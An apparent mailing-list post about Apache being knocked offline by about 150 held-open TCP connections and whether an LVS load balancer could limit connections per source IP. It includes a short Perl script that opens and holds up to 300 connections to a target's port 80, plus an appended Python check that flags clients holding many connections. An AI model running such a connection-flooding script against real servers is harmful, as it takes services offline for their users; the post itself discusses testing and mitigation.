Hi,

To my surprise, opening 150 TCP connections to a default Apache
installation is enough to effectively DoS it for a few minutes (until
connections time out). This could be circumvented by using
mod_throttle, mod_bwshare or mod_limitipconn, but imho a much better
place to solve this is at the LVS load balancer, which already does
source IP tracking for the "persistency" feature.

Did anyone implement such a feature? Considerations?

A sample script to test your webhosting provider:

#!/usr/bin/perl
my $target = shift or die "Usage: $0 <target>\n";
use IO::Socket::INET;
for my $t (0..300) {
    print "Try $t... ";
    $cons[$t] = IO::Socket::INET->new( PeerAddr => "$target:80",
                                       Proto => 'tcp', Blocking => 1 )
        or die "Couldn't connect!";
    print "connected!\n";
}
print "Enter to drop connections...\n";
<STDIN>;

Regards,
Willem
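
An added example, not part of the original post: one way to see the condition described above from the director's side is to count open connections per client IP in the LVS connection table. It assumes the column layout printed by `ipvsadm -Lcn`; the limit of 50, the allowlist parameter and all addresses are constructed for illustration.

```python
import re
from collections import Counter

# One row of `ipvsadm -Lcn`: pro expire state source virtual destination
ROW = re.compile(r"^(?:TCP|UDP)\s+\S+\s+(\S+)\s+(\S+):\d+\s+(\S+:\d+)\s+\S+:\d+\s*$")

def open_per_source(text, states=("ESTABLISHED", "SYN_RECV")):
    """Count connections per (virtual service, client IP) in the given states."""
    counts = Counter()
    for line in text.splitlines():
        m = ROW.match(line)
        if m and m.group(1) in states:  # header and blank lines do not match
            counts[(m.group(3), m.group(2))] += 1
    return counts

def over_limit(text, limit, allow=()):
    """Sources holding more than `limit` connections to one virtual service.
    `allow` lists client IPs exempt from the check (e.g. known NAT gateways)."""
    return {k: n for k, n in open_per_source(text).items()
            if n > limit and k[1] not in allow}

def _row(state, src, port):  # builds one constructed sample row
    return f"TCP 14:52  {state:<11} {src}:{port} 203.0.113.10:80 10.0.0.11:80"

# Constructed sample table (documentation addresses, not from the post)
SAMPLE = "\n".join(
    ["IPVS connection entries",
     "pro expire state       source             virtual            destination"]
    + [_row("ESTABLISHED", "198.51.100.7", 40000 + i) for i in range(160)]
    + [_row("ESTABLISHED", "192.0.2.33", 51000 + i) for i in range(4)]
    + [_row("TIME_WAIT", "192.0.2.33", 52000 + i) for i in range(80)])

if __name__ == "__main__":
    for (vip, src), n in over_limit(SAMPLE, limit=50).items():
        print(f"{src} holds {n} open connections to {vip}")
```

Entries in TIME_WAIT are ignored because they no longer occupy a server slot, and the allowlist matters because many legitimate clients can share one address behind NAT or a proxy.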